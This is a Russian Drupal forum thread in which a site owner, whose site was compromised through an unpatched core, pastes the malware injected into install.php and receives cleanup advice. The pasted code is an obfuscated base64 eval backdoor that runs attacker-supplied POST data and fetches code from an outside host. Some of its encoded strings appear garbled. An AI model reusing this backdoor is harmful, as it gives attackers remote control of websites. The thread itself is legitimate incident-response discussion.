Взломали сайт! Нашел файл install.php с неким кодом

Аватар пользователя Junegton Junegton 15 июня 2018 в 15:53

Всем привет!
Пару недель назад Яндекс Вебмастер начал репортить о вредоносных кодах на паре страниц. Не придал значения - нажал "исправлено", ошибка пропала.
А тут захожу на главную - сайт редиректит на чужую страницу.

Полез в папки, нашел install.php файл с атрибутами (777) и вот таким кодом:
Что это такое и как его побороть теперь??

<?php /*457563643*/ error_reporting(0); [user=ini_set]ini_set[/user]('error_log',NULL); [user=ini_set]ini_set[/user]('log_errors',0); [user=ini_set]ini_set[/user]('display_errors','Off'); [user=eval]eval[/user]( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQ0KaWYgKHN0cnBvcygkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgInBvc3RfcmVuZGVyIiApICE9PSBmYWxzZSkgeyAkcGF0Y2hlZGZ2ID0gIkdIS0FTTVZHIjsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); [user=ini_restore]ini_restore[/user]('error_log'); [user=ini_restore]ini_restore[/user]('display_errors'); /*457563643*/ ?><?php  ?><?php /*67458335*/ error_reporting(0); [user=ini_set]ini_set[/user]('error_log',NULL); [user=ini_set]ini_set[/user]('log_errors',0); [user=ini_set]ini_set[/user]('display_errors','Off'); [user=eval]eval[/user]( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KCmlmIChzdHJwb3MoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCAiV2luIiApID09PSBmYIGltcGxvZGUoInwiLCAkZ2hmanUpIC4gIi9pIiwgJGJrbGpnKSkgb3IgKEAkX0NPT0tJRVsnY29uZHRpb25zJ10pICBvciAoISRia2xqZykgb3IgKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSA9PT0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPKCR2a2Z1KSB7IEBldmFsKCR2a2Z1KTsgfSBlbHNlIHtvYl9zdGFydCgpOyAgaWYoIUBoZWFkZXJzX3NlbnQoKSkgeyBAc2V0Y29va2llKCJjb25kdGlvbnMiLCIyIix0aW1lKCkrMTcyODAwKTsgfSBlbHNlIHsgZWNobyAiPHNjcmlwdD5kb2N1bWVudC5jb29raWU9J2NvbmR0aW9ucz0yOyBwYXRoPS87IGV4cGlyZXM9Ii5kYXRlKCdELCBkLU0tWSBIOmk6cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); [user=ini_restore]ini_restore[/user]('error_log'); [user=ini_restore]ini_restore[/user]('display_errors'); /*67458335*/ ?><?php /*564794552*/ error_reporting(0); [user=ini_set]ini_set[/user]('error_log',NULL); [user=ini_set]ini_set[/user]('log_errors',0); [user=ini_set]ini_set[/user]('display_errors','Off'); [user=eval]eval[/user]( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KaWYoJHBhdGNoZWRmdiA9PT0gIkdIS0FTTVZHIiApIHsgQG9iX2VuZF9jbGVhbigpOyAgZGllOyAgfQoKaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbGAwKTsgfSBlbHNlIHsgZWNobyAiPHNjcmlwdD5kb2N1bWVudC5jb29raWU9J2NvbmR0aW9ucz0yOyBwYXRoPS87IGV4cGlyZXM9Ii5kYXRlKCdELCBkLU0tWSBIOmk6cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); [user=ini_restore]ini_restore[/user]('error_log'); [user=ini_restore]ini_restore[/user]('display_errors'); /*564794552*/ ?><?php /*435345352*/ error_reporting(0); [user=ini_set]ini_set[/user]('error_log',NULL); [user=ini_set]ini_set[/user]('log_errors',0); [user=ini_set]ini_set[/user]('display_errors','Off'); [user=eval]eval[/user]( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KaWYoJHBhdGNoZWRmdiA9PT0gIkdIS0FTTVZHIiApIHsgIEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgICB9')); [user=ini_restore]ini_restore[/user]('error_log'); [user=ini_restore]ini_restore[/user]('display_errors'); /*435345352*/ ?><?php

/**
 * file
 * Initiates a browser-based installation of Drupal.
 */

/**
 * Defines the root directory of the Drupal installation.
 */

define('DRUPAL_ROOT', getcwd());

/**
 * Global flag to indicate the site is in installation mode.
 */

define('MAINTENANCE_MODE', 'install');

// Exit early if running an incompatible PHP version to avoid fatal errors.
if (version_compare(PHP_VERSION, '5.2.4') < 0) {
  print 'Your PHP installation is too old. Drupal requires at least PHP 5.2.4. See the <a href="http://drupal.org/requirements">system requirements</a> page for more information.';
  exit;
}

// Start the installer.
require_once DRUPAL_ROOT . '/includes/install.core.inc';
install_drupal();

ВложениеРазмер
Иконка изображения вот такая бяка там32.92 КБ

Лучший ответ

Аватар пользователя Junegton Junegton 1 июля 2018 в 0:31

Странно, так как не могу изменить тему и добавить [РЕШЕНО], то пишу тут - РЕШЕНО!
ИТОГИ
1 - Ищем в файлах на сервере злополучный код и удаляем его - а лучше вообще обновить ядро до последней версии. В оставшихся папках снова ищем по файлам строки вируса и удаляем.
2- Потом проверяем на всякий базу по ключевым словам - например из кода вируса.

Вроде как помогло.

Комментарии

Аватар пользователя Junegton Junegton 15 июня 2018 в 15:54

там еще много вот такой лабуды , в верхнем сообщении она не отображается почему-то
base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQ0KaWYgKHN0cnBvcygkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgInBvc3RfcmVuZGVyIiApICE9PSBmYWxzZSkgeyAkcGF0Y2hlZGZ2ID0gIkdIS0FTTVZHIjsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /

Аватар пользователя ivnish ivnish 15 июня 2018 в 16:16

Это заражение сайта, вовремя не обновленного до версии 7.59. Лечить руками. Внимательно. Чистить файлы, чистить базу. Если вылечите не всё, то через несколько дней всё повторится.

Готов помочь с лечением, пишите в личку

Аватар пользователя Phantom63rus Phantom63rus 15 июня 2018 в 16:17

Вероятнее всего вы не обновили версию ядра, из-за чего вас взломали. У ядер ниже 7.58 выявлена критическая уязвимость.

Теперь вам необходимо:
1. Обновить все модули и ядро перезаливкой.
2. Скачать утилиту ai-bolit и пробежаться ею в параноидальном режиме.
3. Посмотреть папку files на предмет скриптов.
4. Очень внимательно посмотреть содержание папки libraries на предмет вирусни.
5. Проверить на наличие пхп вхождений базу данных.
6. Проверить нет ли лишних пользователей с ролью администраторов и вообще посмотреть внимательно на права.

Ну или обращайтесь, поможем.

Аватар пользователя Junegton Junegton 15 июня 2018 в 16:28

Всем еще раз привет и спасибо за ответы!
Дааа, я уже увидел - залезло везде где только можно! Я уже начал вычищать, но видимо, трудности еще впереди. Если сам не справлюсь, придется обращаться.
Дрянь расползлась по сайту =).
Вот самое страшное- это проверить БД, пока не представляю как это сделать даже. Ибо php включен Smile я так понимаю, он может вызываться из БД, а не только из кода в файле?

Аватар пользователя ivnish ivnish 15 июня 2018 в 17:11

Да, при наличии php-фильтра, боты создают в БД ноды/блоки с кодом для заливки шеллов. Даже если вычистить файлы, они смогут продолжать владеть сайтом используя эти ноды/блоки

Аватар пользователя Phantom63rus Phantom63rus 15 июня 2018 в 17:37

Оно ещё и где нельзя залезло;)

БД проверяется очень просто - дамп базы на комп, блокнот (ну или что-то в стиле notepad++, akelapad, etc ибо объёмно) и банальный поиск.

Аватар пользователя Junegton Junegton 15 июня 2018 в 21:24

Итог- сайт попал в блок, как вредоносный))) пушистый зверек прям!

Промежуточный итог чистки:
1- настроение конечно испортилось, даже не хотел браться за это сегодня, но ... на мины
2- провел анализ папок! Выяснилось, что эта дрянь поразила все доступные php файлы - прямо вначале файла даписало бяку как писал выше!
3- в папках где вирус получил доступ он создал свои новые зараженные файлы php с этой же бякой
5 в корне сайта создалось около 5 новых зараженных файлов!
6- БД вроде как не задело!!!!

Радостные новости: когда давно еще делал сайт - работал под разными фтп пользователями!!! И что получилось - вирус поразил только те файлы и папки, права которых принадлежали фтп пользователю сайта!!! А там где права остались пользователя root от операционки - вирус ничего не сделал!!! Как итог - всего поразилось около 20-30 php файлов, и еще около 20 вирус создал новых!
Т. е. моя криворукость пошла на пользу!! Большие папки такие как moduls где миллин php файлов остались нетронуты вроде как!!!

Процесс лечения:
Ненужные файлы заменил из нового архива друпал, нужные лечил руками - удалил вредоносные строки!
Почти на все папки и файлы права присвоил root пользователя)

Появились вопросы - как вирус проник и получил доступ? И почему он поразил файлы и папки именно пользователя сайта?
Как защитить остальные свои сайты от такой напасти?

Сайт перестал редиректить, пока работа восстановлена - буду держать на контроле!

Ну и ядро конечно же обновил до последней версии!

Аватар пользователя Junegton Junegton 15 июня 2018 в 21:26

Olegars wrote:

можно просто воспользоваться поиском в phpmyadmin

а что искать нужно?
Я так и сделал - только пробовал найти элементы текста из зараженных строк - совпадений было ноль)) Надеюсь прогесло!

Аватар пользователя VasyOK VasyOK 16 июня 2018 в 6:27

itcrowd72 wrote:

Да, при наличии php-фильтра, боты создают в БД ноды/блоки с кодом для заливки шеллов.

"Доктор у моего друга подозрение на триппер"
Если бы вы знали сколько на Монстре продается сборок в которых некоторые вещи выводятся с помощью php фильтра вставленного в блоки. Это опасно? Предполагается что редактировать блоки может только админ. А зарегистрированных пользователей на сайте вообще нет.

Аватар пользователя ivnish ivnish 16 июня 2018 в 8:47

Когда злоумышленники могут создавать любые файлы в каталоге с сайтом, стать админом - дело 1 минуты. Если вы об этом

Аватар пользователя VasyOK VasyOK 16 июня 2018 в 8:54

А как создать любой файл в каталоге с сайтом? Что в корне сайта прямо?
По-моему если такая возможность есть уже пофиг включен ли PHP фильтр.
Или я не в ту степь.

Аватар пользователя Junegton Junegton 16 июня 2018 в 23:06

Всем привет!
Второй день пока полет нормальный! Слежу за содержимом папок и отсутствием редиректов! Также пока что яндекс вебмастер молчит о вирусной активности! Может и отделаюсь малой кровью!

Может кто знает или может сказать нде почитать - как начинается такое заражение? Т. е. это бот или человек начинает заражение? Т. е. может человек заходит - пишет какой код в комменты и начинается взлом? Или просто бот обходит сайты и находит жертву?

Аватар пользователя Junegton Junegton 1 июля 2018 в 0:31

Странно, так как не могу изменить тему и добавить [РЕШЕНО], то пишу тут - РЕШЕНО!
ИТОГИ
1 - Ищем в файлах на сервере злополучный код и удаляем его - а лучше вообще обновить ядро до последней версии. В оставшихся папках снова ищем по файлам строки вируса и удаляем.
2- Потом проверяем на всякий базу по ключевым словам - например из кода вируса.

Вроде как помогло.